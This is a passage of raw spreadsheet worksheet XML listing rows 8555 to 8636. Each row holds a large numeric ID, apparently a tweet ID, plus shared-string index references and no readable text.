    <row r="8555" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8555">
        <v>1.23276281360255E+18</v>
      </c>
      <c r="B8555" t="s">
        <v>20601</v>
      </c>
      <c r="C8555" t="s">
        <v>1</v>
      </c>
      <c r="D8555" t="s">
        <v>20602</v>
      </c>
      <c r="E8555" t="s">
        <v>1526</v>
      </c>
    </row>
    <row r="8556" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8556">
        <v>1.2327623565910899E+18</v>
      </c>
      <c r="B8556" t="s">
        <v>20603</v>
      </c>
      <c r="C8556" t="s">
        <v>1</v>
      </c>
      <c r="D8556" t="s">
        <v>20604</v>
      </c>
      <c r="E8556" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8557" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8557">
        <v>1.23276231096977E+18</v>
      </c>
      <c r="B8557" t="s">
        <v>20605</v>
      </c>
      <c r="C8557" t="s">
        <v>1</v>
      </c>
      <c r="D8557" t="s">
        <v>20606</v>
      </c>
      <c r="E8557" t="s">
        <v>20607</v>
      </c>
    </row>
    <row r="8558" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8558">
        <v>1.2327623084573E+18</v>
      </c>
      <c r="B8558" t="s">
        <v>20608</v>
      </c>
      <c r="C8558" t="s">
        <v>1</v>
      </c>
      <c r="D8558" t="s">
        <v>20609</v>
      </c>
      <c r="E8558" t="s">
        <v>20607</v>
      </c>
    </row>
    <row r="8559" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8559">
        <v>1.23276162010479E+18</v>
      </c>
      <c r="B8559" t="s">
        <v>20610</v>
      </c>
      <c r="C8559" t="s">
        <v>1</v>
      </c>
      <c r="D8559" t="s">
        <v>20611</v>
      </c>
      <c r="E8559" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="8560" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8560">
        <v>1.23276152146334E+18</v>
      </c>
      <c r="B8560" t="s">
        <v>20612</v>
      </c>
      <c r="C8560" t="s">
        <v>1</v>
      </c>
      <c r="D8560" t="s">
        <v>20613</v>
      </c>
      <c r="E8560" t="s">
        <v>20614</v>
      </c>
    </row>
    <row r="8561" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8561">
        <v>1.23276133937601E+18</v>
      </c>
      <c r="B8561" t="s">
        <v>20615</v>
      </c>
      <c r="C8561" t="s">
        <v>1</v>
      </c>
      <c r="D8561" t="s">
        <v>20616</v>
      </c>
      <c r="E8561" t="s">
        <v>20617</v>
      </c>
    </row>
    <row r="8562" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8562">
        <v>1.2327606674231099E+18</v>
      </c>
      <c r="B8562" t="s">
        <v>20618</v>
      </c>
      <c r="C8562" t="s">
        <v>1</v>
      </c>
      <c r="D8562" t="s">
        <v>20619</v>
      </c>
      <c r="E8562" t="s">
        <v>20620</v>
      </c>
    </row>
    <row r="8563" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8563">
        <v>1.23276064997504E+18</v>
      </c>
      <c r="B8563" t="s">
        <v>20621</v>
      </c>
      <c r="C8563" t="s">
        <v>1</v>
      </c>
      <c r="D8563" t="s">
        <v>20622</v>
      </c>
      <c r="E8563" t="s">
        <v>20623</v>
      </c>
    </row>
    <row r="8564" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8564">
        <v>1.23276061933967E+18</v>
      </c>
      <c r="B8564" t="s">
        <v>20624</v>
      </c>
      <c r="C8564" t="s">
        <v>1</v>
      </c>
      <c r="D8564" t="s">
        <v>20625</v>
      </c>
      <c r="E8564" t="s">
        <v>20626</v>
      </c>
    </row>
    <row r="8565" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8565">
        <v>1.23276039264608E+18</v>
      </c>
      <c r="B8565" t="s">
        <v>20627</v>
      </c>
      <c r="C8565" t="s">
        <v>1</v>
      </c>
      <c r="D8565" t="s">
        <v>20628</v>
      </c>
      <c r="E8565" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="8566" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8566">
        <v>1.2327601796381599E+18</v>
      </c>
      <c r="B8566" t="s">
        <v>20629</v>
      </c>
      <c r="C8566" t="s">
        <v>1</v>
      </c>
      <c r="D8566" t="s">
        <v>20630</v>
      </c>
      <c r="E8566" t="s">
        <v>7463</v>
      </c>
    </row>
    <row r="8567" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8567">
        <v>1.23275993026173E+18</v>
      </c>
      <c r="B8567" t="s">
        <v>20631</v>
      </c>
      <c r="C8567" t="s">
        <v>1</v>
      </c>
      <c r="D8567" t="s">
        <v>20632</v>
      </c>
      <c r="E8567" t="s">
        <v>20633</v>
      </c>
    </row>
    <row r="8568" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8568">
        <v>1.2327598844221801E+18</v>
      </c>
      <c r="B8568" t="s">
        <v>20634</v>
      </c>
      <c r="C8568" t="s">
        <v>1</v>
      </c>
      <c r="D8568" t="s">
        <v>20635</v>
      </c>
      <c r="E8568" t="s">
        <v>20636</v>
      </c>
    </row>
    <row r="8569" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8569">
        <v>1.2327598096713999E+18</v>
      </c>
      <c r="B8569" t="s">
        <v>20637</v>
      </c>
      <c r="C8569" t="s">
        <v>1</v>
      </c>
      <c r="D8569" t="s">
        <v>20638</v>
      </c>
      <c r="E8569" t="s">
        <v>20639</v>
      </c>
    </row>
    <row r="8570" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8570">
        <v>1.2327597766160901E+18</v>
      </c>
      <c r="B8570" t="s">
        <v>20640</v>
      </c>
      <c r="C8570" t="s">
        <v>1</v>
      </c>
      <c r="D8570" t="s">
        <v>20641</v>
      </c>
      <c r="E8570" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="8571" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8571">
        <v>1.2327595973431501E+18</v>
      </c>
      <c r="B8571" t="s">
        <v>20642</v>
      </c>
      <c r="C8571" t="s">
        <v>1</v>
      </c>
      <c r="D8571" t="s">
        <v>20643</v>
      </c>
      <c r="E8571" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="8572" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8572">
        <v>1.2327591540387699E+18</v>
      </c>
      <c r="B8572" t="s">
        <v>20644</v>
      </c>
      <c r="C8572" t="s">
        <v>1</v>
      </c>
      <c r="D8572" t="s">
        <v>20645</v>
      </c>
      <c r="E8572" t="s">
        <v>20646</v>
      </c>
    </row>
    <row r="8573" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8573">
        <v>1.2327587956018701E+18</v>
      </c>
      <c r="B8573" t="s">
        <v>20647</v>
      </c>
      <c r="C8573" t="s">
        <v>1</v>
      </c>
      <c r="D8573" t="s">
        <v>20648</v>
      </c>
      <c r="E8573" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="8574" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8574">
        <v>1.23275876927424E+18</v>
      </c>
      <c r="B8574" t="s">
        <v>20649</v>
      </c>
      <c r="C8574" t="s">
        <v>1</v>
      </c>
      <c r="D8574" t="s">
        <v>20650</v>
      </c>
      <c r="E8574" t="s">
        <v>10291</v>
      </c>
    </row>
    <row r="8575" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8575">
        <v>1.23275800667426E+18</v>
      </c>
      <c r="B8575" t="s">
        <v>20651</v>
      </c>
      <c r="C8575" t="s">
        <v>1</v>
      </c>
      <c r="D8575" t="s">
        <v>20652</v>
      </c>
      <c r="E8575" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="8576" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8576">
        <v>1.23275792739779E+18</v>
      </c>
      <c r="B8576" t="s">
        <v>20653</v>
      </c>
      <c r="C8576" t="s">
        <v>1</v>
      </c>
      <c r="D8576" t="s">
        <v>20654</v>
      </c>
      <c r="E8576" t="s">
        <v>7732</v>
      </c>
    </row>
    <row r="8577" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8577">
        <v>1.23275783899843E+18</v>
      </c>
      <c r="B8577" t="s">
        <v>20655</v>
      </c>
      <c r="C8577" t="s">
        <v>1</v>
      </c>
      <c r="D8577" t="s">
        <v>20656</v>
      </c>
      <c r="E8577" t="s">
        <v>20657</v>
      </c>
    </row>
    <row r="8578" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8578">
        <v>1.23275773856177E+18</v>
      </c>
      <c r="B8578" t="s">
        <v>20658</v>
      </c>
      <c r="C8578" t="s">
        <v>1</v>
      </c>
      <c r="D8578" t="s">
        <v>20659</v>
      </c>
      <c r="E8578" t="s">
        <v>1150</v>
      </c>
    </row>
    <row r="8579" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8579">
        <v>1.23275773705601E+18</v>
      </c>
      <c r="B8579" t="s">
        <v>20660</v>
      </c>
      <c r="C8579" t="s">
        <v>1</v>
      </c>
      <c r="D8579" t="s">
        <v>20661</v>
      </c>
      <c r="E8579" t="s">
        <v>5503</v>
      </c>
    </row>
    <row r="8580" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8580">
        <v>1.23275760894928E+18</v>
      </c>
      <c r="B8580" t="s">
        <v>20662</v>
      </c>
      <c r="C8580" t="s">
        <v>1</v>
      </c>
      <c r="D8580" t="s">
        <v>20663</v>
      </c>
      <c r="E8580" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="8581" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8581">
        <v>1.23275752411122E+18</v>
      </c>
      <c r="B8581" t="s">
        <v>20664</v>
      </c>
      <c r="C8581" t="s">
        <v>1</v>
      </c>
      <c r="D8581" t="s">
        <v>20665</v>
      </c>
      <c r="E8581" t="s">
        <v>20666</v>
      </c>
    </row>
    <row r="8582" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8582">
        <v>1.23275723880211E+18</v>
      </c>
      <c r="B8582" t="s">
        <v>20667</v>
      </c>
      <c r="C8582" t="s">
        <v>1</v>
      </c>
      <c r="D8582" t="s">
        <v>20668</v>
      </c>
      <c r="E8582" t="s">
        <v>12698</v>
      </c>
    </row>
    <row r="8583" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8583">
        <v>1.2327569808733299E+18</v>
      </c>
      <c r="B8583" t="s">
        <v>20669</v>
      </c>
      <c r="C8583" t="s">
        <v>1</v>
      </c>
      <c r="D8583" t="s">
        <v>20670</v>
      </c>
      <c r="E8583" t="s">
        <v>20671</v>
      </c>
    </row>
    <row r="8584" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8584">
        <v>1.2327565524000599E+18</v>
      </c>
      <c r="B8584" t="s">
        <v>20672</v>
      </c>
      <c r="C8584" t="s">
        <v>1</v>
      </c>
      <c r="D8584" t="s">
        <v>20673</v>
      </c>
      <c r="E8584" t="s">
        <v>20674</v>
      </c>
    </row>
    <row r="8585" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8585">
        <v>1.23275618447567E+18</v>
      </c>
      <c r="B8585" t="s">
        <v>20675</v>
      </c>
      <c r="C8585" t="s">
        <v>1</v>
      </c>
      <c r="D8585" t="s">
        <v>20676</v>
      </c>
      <c r="E8585" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="8586" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8586">
        <v>1.2327556721708001E+18</v>
      </c>
      <c r="B8586" t="s">
        <v>20677</v>
      </c>
      <c r="C8586" t="s">
        <v>1</v>
      </c>
      <c r="D8586" t="s">
        <v>20678</v>
      </c>
      <c r="E8586" t="s">
        <v>20679</v>
      </c>
    </row>
    <row r="8587" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8587">
        <v>1.2327550220956301E+18</v>
      </c>
      <c r="B8587" t="s">
        <v>20680</v>
      </c>
      <c r="C8587" t="s">
        <v>1</v>
      </c>
      <c r="D8587" t="s">
        <v>20681</v>
      </c>
      <c r="E8587" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8588" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8588">
        <v>1.23275460095809E+18</v>
      </c>
      <c r="B8588" t="s">
        <v>20682</v>
      </c>
      <c r="C8588" t="s">
        <v>1</v>
      </c>
      <c r="D8588" t="s">
        <v>20683</v>
      </c>
      <c r="E8588" t="s">
        <v>11379</v>
      </c>
    </row>
    <row r="8589" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8589">
        <v>1.2327535009432599E+18</v>
      </c>
      <c r="B8589" t="s">
        <v>20684</v>
      </c>
      <c r="C8589" t="s">
        <v>1</v>
      </c>
      <c r="D8589" t="s">
        <v>20685</v>
      </c>
      <c r="E8589" t="s">
        <v>15824</v>
      </c>
    </row>
    <row r="8590" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8590">
        <v>1.23275312710914E+18</v>
      </c>
      <c r="B8590" t="s">
        <v>20686</v>
      </c>
      <c r="C8590" t="s">
        <v>1</v>
      </c>
      <c r="D8590" t="s">
        <v>20687</v>
      </c>
      <c r="E8590" t="s">
        <v>18508</v>
      </c>
    </row>
    <row r="8591" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8591">
        <v>1.2327530478703401E+18</v>
      </c>
      <c r="B8591" t="s">
        <v>20688</v>
      </c>
      <c r="C8591" t="s">
        <v>1</v>
      </c>
      <c r="D8591" t="s">
        <v>20689</v>
      </c>
      <c r="E8591" t="s">
        <v>20690</v>
      </c>
    </row>
    <row r="8592" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8592">
        <v>1.2327529707998999E+18</v>
      </c>
      <c r="B8592" t="s">
        <v>20691</v>
      </c>
      <c r="C8592" t="s">
        <v>1</v>
      </c>
      <c r="D8592" t="s">
        <v>20692</v>
      </c>
      <c r="E8592" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="8593" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8593">
        <v>1.2327528515558799E+18</v>
      </c>
      <c r="B8593" t="s">
        <v>20693</v>
      </c>
      <c r="C8593" t="s">
        <v>1</v>
      </c>
      <c r="D8593" t="s">
        <v>20694</v>
      </c>
      <c r="E8593" t="s">
        <v>20695</v>
      </c>
    </row>
    <row r="8594" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8594">
        <v>1.2327516467253601E+18</v>
      </c>
      <c r="B8594" t="s">
        <v>20696</v>
      </c>
      <c r="C8594" t="s">
        <v>1</v>
      </c>
      <c r="D8594" t="s">
        <v>20697</v>
      </c>
      <c r="E8594" t="s">
        <v>6601</v>
      </c>
    </row>
    <row r="8595" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8595">
        <v>1.2327509404170701E+18</v>
      </c>
      <c r="B8595" t="s">
        <v>20698</v>
      </c>
      <c r="C8595" t="s">
        <v>1</v>
      </c>
      <c r="D8595" t="s">
        <v>20699</v>
      </c>
      <c r="E8595" t="s">
        <v>2248</v>
      </c>
    </row>
    <row r="8596" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8596">
        <v>1.23275047635089E+18</v>
      </c>
      <c r="B8596" t="s">
        <v>20700</v>
      </c>
      <c r="C8596" t="s">
        <v>1</v>
      </c>
      <c r="D8596" t="s">
        <v>20701</v>
      </c>
      <c r="E8596" t="s">
        <v>20702</v>
      </c>
    </row>
    <row r="8597" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8597">
        <v>1.23275041760115E+18</v>
      </c>
      <c r="B8597" t="s">
        <v>20703</v>
      </c>
      <c r="C8597" t="s">
        <v>1</v>
      </c>
      <c r="D8597" t="s">
        <v>20704</v>
      </c>
      <c r="E8597" t="s">
        <v>2176</v>
      </c>
    </row>
    <row r="8598" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8598">
        <v>1.2327501575167301E+18</v>
      </c>
      <c r="B8598" t="s">
        <v>20705</v>
      </c>
      <c r="C8598" t="s">
        <v>1</v>
      </c>
      <c r="D8598" t="s">
        <v>20706</v>
      </c>
      <c r="E8598" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8599" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8599">
        <v>1.2327498134285499E+18</v>
      </c>
      <c r="B8599" t="s">
        <v>20707</v>
      </c>
      <c r="C8599" t="s">
        <v>1</v>
      </c>
      <c r="D8599" t="s">
        <v>20708</v>
      </c>
      <c r="E8599" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="8600" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8600">
        <v>1.2327496807668301E+18</v>
      </c>
      <c r="B8600" t="s">
        <v>20709</v>
      </c>
      <c r="C8600" t="s">
        <v>1</v>
      </c>
      <c r="D8600" t="s">
        <v>20710</v>
      </c>
      <c r="E8600" t="s">
        <v>13530</v>
      </c>
    </row>
    <row r="8601" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8601">
        <v>1.2327484992189701E+18</v>
      </c>
      <c r="B8601" t="s">
        <v>20711</v>
      </c>
      <c r="C8601" t="s">
        <v>1</v>
      </c>
      <c r="D8601" t="s">
        <v>20712</v>
      </c>
      <c r="E8601" t="s">
        <v>18616</v>
      </c>
    </row>
    <row r="8602" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8602">
        <v>1.23274822450463E+18</v>
      </c>
      <c r="B8602" t="s">
        <v>20713</v>
      </c>
      <c r="C8602" t="s">
        <v>1</v>
      </c>
      <c r="D8602" t="s">
        <v>20714</v>
      </c>
      <c r="E8602" t="s">
        <v>20715</v>
      </c>
    </row>
    <row r="8603" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8603">
        <v>1.23274764798898E+18</v>
      </c>
      <c r="B8603" t="s">
        <v>20716</v>
      </c>
      <c r="C8603" t="s">
        <v>1</v>
      </c>
      <c r="D8603" t="s">
        <v>20717</v>
      </c>
      <c r="E8603" t="s">
        <v>20718</v>
      </c>
    </row>
    <row r="8604" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8604">
        <v>1.2327476448013801E+18</v>
      </c>
      <c r="B8604" t="s">
        <v>20719</v>
      </c>
      <c r="C8604" t="s">
        <v>1</v>
      </c>
      <c r="D8604" t="s">
        <v>20720</v>
      </c>
      <c r="E8604" t="s">
        <v>20721</v>
      </c>
    </row>
    <row r="8605" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8605">
        <v>1.23274764312366E+18</v>
      </c>
      <c r="B8605" t="s">
        <v>20719</v>
      </c>
      <c r="C8605" t="s">
        <v>1</v>
      </c>
      <c r="D8605" t="s">
        <v>20722</v>
      </c>
      <c r="E8605" t="s">
        <v>20723</v>
      </c>
    </row>
    <row r="8606" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8606">
        <v>1.2327476126478799E+18</v>
      </c>
      <c r="B8606" t="s">
        <v>20724</v>
      </c>
      <c r="C8606" t="s">
        <v>1</v>
      </c>
      <c r="D8606" t="s">
        <v>20725</v>
      </c>
      <c r="E8606" t="s">
        <v>5668</v>
      </c>
    </row>
    <row r="8607" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8607">
        <v>1.23274724062577E+18</v>
      </c>
      <c r="B8607" t="s">
        <v>20726</v>
      </c>
      <c r="C8607" t="s">
        <v>1</v>
      </c>
      <c r="D8607" t="s">
        <v>20727</v>
      </c>
      <c r="E8607" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8608" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8608">
        <v>1.23274700546787E+18</v>
      </c>
      <c r="B8608" t="s">
        <v>20728</v>
      </c>
      <c r="C8608" t="s">
        <v>1</v>
      </c>
      <c r="D8608" t="s">
        <v>20729</v>
      </c>
      <c r="E8608" t="s">
        <v>20730</v>
      </c>
    </row>
    <row r="8609" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8609">
        <v>1.23274688767918E+18</v>
      </c>
      <c r="B8609" t="s">
        <v>20731</v>
      </c>
      <c r="C8609" t="s">
        <v>1</v>
      </c>
      <c r="D8609" t="s">
        <v>20732</v>
      </c>
      <c r="E8609" t="s">
        <v>1740</v>
      </c>
    </row>
    <row r="8610" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8610">
        <v>1.2327464061899599E+18</v>
      </c>
      <c r="B8610" t="s">
        <v>20733</v>
      </c>
      <c r="C8610" t="s">
        <v>1</v>
      </c>
      <c r="D8610" t="s">
        <v>20734</v>
      </c>
      <c r="E8610" t="s">
        <v>4855</v>
      </c>
    </row>
    <row r="8611" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8611">
        <v>1.23274589874192E+18</v>
      </c>
      <c r="B8611" t="s">
        <v>20735</v>
      </c>
      <c r="C8611" t="s">
        <v>1</v>
      </c>
      <c r="D8611" t="s">
        <v>20736</v>
      </c>
      <c r="E8611" t="s">
        <v>15483</v>
      </c>
    </row>
    <row r="8612" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8612">
        <v>1.23274588634769E+18</v>
      </c>
      <c r="B8612" t="s">
        <v>20737</v>
      </c>
      <c r="C8612" t="s">
        <v>1</v>
      </c>
      <c r="D8612" t="s">
        <v>20738</v>
      </c>
      <c r="E8612" t="s">
        <v>20739</v>
      </c>
    </row>
    <row r="8613" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8613">
        <v>1.2327458729471301E+18</v>
      </c>
      <c r="B8613" t="s">
        <v>20740</v>
      </c>
      <c r="C8613" t="s">
        <v>1</v>
      </c>
      <c r="D8613" t="s">
        <v>20741</v>
      </c>
      <c r="E8613" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="8614" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8614">
        <v>1.2327453023875E+18</v>
      </c>
      <c r="B8614" t="s">
        <v>20742</v>
      </c>
      <c r="C8614" t="s">
        <v>1</v>
      </c>
      <c r="D8614" t="s">
        <v>20743</v>
      </c>
      <c r="E8614" t="s">
        <v>5726</v>
      </c>
    </row>
    <row r="8615" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8615">
        <v>1.2327451468333599E+18</v>
      </c>
      <c r="B8615" t="s">
        <v>20744</v>
      </c>
      <c r="C8615" t="s">
        <v>1</v>
      </c>
      <c r="D8615" t="s">
        <v>20745</v>
      </c>
      <c r="E8615" t="s">
        <v>20746</v>
      </c>
    </row>
    <row r="8616" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8616">
        <v>1.2327448948603899E+18</v>
      </c>
      <c r="B8616" t="s">
        <v>20747</v>
      </c>
      <c r="C8616" t="s">
        <v>1</v>
      </c>
      <c r="D8616" t="s">
        <v>20748</v>
      </c>
      <c r="E8616" t="s">
        <v>20749</v>
      </c>
    </row>
    <row r="8617" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8617">
        <v>1.2327448078538801E+18</v>
      </c>
      <c r="B8617" t="s">
        <v>20750</v>
      </c>
      <c r="C8617" t="s">
        <v>1</v>
      </c>
      <c r="D8617" t="s">
        <v>20751</v>
      </c>
      <c r="E8617" t="s">
        <v>20752</v>
      </c>
    </row>
    <row r="8618" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8618">
        <v>1.2327446787197199E+18</v>
      </c>
      <c r="B8618" t="s">
        <v>20753</v>
      </c>
      <c r="C8618" t="s">
        <v>1</v>
      </c>
      <c r="D8618" t="s">
        <v>20754</v>
      </c>
      <c r="E8618" t="s">
        <v>20755</v>
      </c>
    </row>
    <row r="8619" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8619">
        <v>1.23274450870355E+18</v>
      </c>
      <c r="B8619" t="s">
        <v>20756</v>
      </c>
      <c r="C8619" t="s">
        <v>1</v>
      </c>
      <c r="D8619" t="s">
        <v>20757</v>
      </c>
      <c r="E8619" t="s">
        <v>5263</v>
      </c>
    </row>
    <row r="8620" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8620">
        <v>1.2327438973670001E+18</v>
      </c>
      <c r="B8620" t="s">
        <v>20758</v>
      </c>
      <c r="C8620" t="s">
        <v>1</v>
      </c>
      <c r="D8620" t="s">
        <v>20759</v>
      </c>
      <c r="E8620" t="s">
        <v>14269</v>
      </c>
    </row>
    <row r="8621" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8621">
        <v>1.2327438090558999E+18</v>
      </c>
      <c r="B8621" t="s">
        <v>20760</v>
      </c>
      <c r="C8621" t="s">
        <v>1</v>
      </c>
      <c r="D8621" t="s">
        <v>20761</v>
      </c>
      <c r="E8621" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="8622" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8622">
        <v>1.23274347522705E+18</v>
      </c>
      <c r="B8622" t="s">
        <v>20762</v>
      </c>
      <c r="C8622" t="s">
        <v>1</v>
      </c>
      <c r="D8622" t="s">
        <v>20763</v>
      </c>
      <c r="E8622" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="8623" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8623">
        <v>1.2327433529757399E+18</v>
      </c>
      <c r="B8623" t="s">
        <v>20764</v>
      </c>
      <c r="C8623" t="s">
        <v>1</v>
      </c>
      <c r="D8623" t="s">
        <v>20765</v>
      </c>
      <c r="E8623" t="s">
        <v>7469</v>
      </c>
    </row>
    <row r="8624" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8624">
        <v>1.23274332057473E+18</v>
      </c>
      <c r="B8624" t="s">
        <v>20766</v>
      </c>
      <c r="C8624" t="s">
        <v>1</v>
      </c>
      <c r="D8624" t="s">
        <v>20767</v>
      </c>
      <c r="E8624" t="s">
        <v>8375</v>
      </c>
    </row>
    <row r="8625" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8625">
        <v>1.2327431812986501E+18</v>
      </c>
      <c r="B8625" t="s">
        <v>20768</v>
      </c>
      <c r="C8625" t="s">
        <v>1</v>
      </c>
      <c r="D8625" t="s">
        <v>20769</v>
      </c>
      <c r="E8625" t="s">
        <v>1783</v>
      </c>
    </row>
    <row r="8626" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8626">
        <v>1.2327429546007401E+18</v>
      </c>
      <c r="B8626" t="s">
        <v>20770</v>
      </c>
      <c r="C8626" t="s">
        <v>1</v>
      </c>
      <c r="D8626" t="s">
        <v>20771</v>
      </c>
      <c r="E8626" t="s">
        <v>7365</v>
      </c>
    </row>
    <row r="8627" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8627">
        <v>1.2327424812903099E+18</v>
      </c>
      <c r="B8627" t="s">
        <v>20772</v>
      </c>
      <c r="C8627" t="s">
        <v>1</v>
      </c>
      <c r="D8627" t="s">
        <v>20773</v>
      </c>
      <c r="E8627" t="s">
        <v>20774</v>
      </c>
    </row>
    <row r="8628" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8628">
        <v>1.2327424655029499E+18</v>
      </c>
      <c r="B8628" t="s">
        <v>20775</v>
      </c>
      <c r="C8628" t="s">
        <v>1</v>
      </c>
      <c r="D8628" t="s">
        <v>20776</v>
      </c>
      <c r="E8628" t="s">
        <v>2149</v>
      </c>
    </row>
    <row r="8629" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8629">
        <v>1.2327423316793001E+18</v>
      </c>
      <c r="B8629" t="s">
        <v>20777</v>
      </c>
      <c r="C8629" t="s">
        <v>1</v>
      </c>
      <c r="D8629" t="s">
        <v>20778</v>
      </c>
      <c r="E8629" t="s">
        <v>20779</v>
      </c>
    </row>
    <row r="8630" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8630">
        <v>1.23274230767965E+18</v>
      </c>
      <c r="B8630" t="s">
        <v>20780</v>
      </c>
      <c r="C8630" t="s">
        <v>1</v>
      </c>
      <c r="D8630" t="s">
        <v>1798</v>
      </c>
      <c r="E8630" t="s">
        <v>1504</v>
      </c>
    </row>
    <row r="8631" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8631">
        <v>1.23274225711314E+18</v>
      </c>
      <c r="B8631" t="s">
        <v>20781</v>
      </c>
      <c r="C8631" t="s">
        <v>1</v>
      </c>
      <c r="D8631" t="s">
        <v>20782</v>
      </c>
      <c r="E8631" t="s">
        <v>20783</v>
      </c>
    </row>
    <row r="8632" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8632">
        <v>1.23274202150627E+18</v>
      </c>
      <c r="B8632" t="s">
        <v>20784</v>
      </c>
      <c r="C8632" t="s">
        <v>1</v>
      </c>
      <c r="D8632" t="s">
        <v>20785</v>
      </c>
      <c r="E8632" t="s">
        <v>4577</v>
      </c>
    </row>
    <row r="8633" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8633">
        <v>1.2327419509287301E+18</v>
      </c>
      <c r="B8633" t="s">
        <v>20786</v>
      </c>
      <c r="C8633" t="s">
        <v>1</v>
      </c>
      <c r="D8633" t="s">
        <v>20787</v>
      </c>
      <c r="E8633" t="s">
        <v>20788</v>
      </c>
    </row>
    <row r="8634" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8634">
        <v>1.2327412396336901E+18</v>
      </c>
      <c r="B8634" t="s">
        <v>20789</v>
      </c>
      <c r="C8634" t="s">
        <v>1</v>
      </c>
      <c r="D8634" t="s">
        <v>20790</v>
      </c>
      <c r="E8634" t="s">
        <v>5188</v>
      </c>
    </row>
    <row r="8635" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8635">
        <v>1.2327409102339799E+18</v>
      </c>
      <c r="B8635" t="s">
        <v>20791</v>
      </c>
      <c r="C8635" t="s">
        <v>1</v>
      </c>
      <c r="D8635" t="s">
        <v>20792</v>
      </c>
      <c r="E8635" t="s">
        <v>1707</v>
      </c>
    </row>
    <row r="8636" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8636">
        <v>1.23274028540432E+18</v>
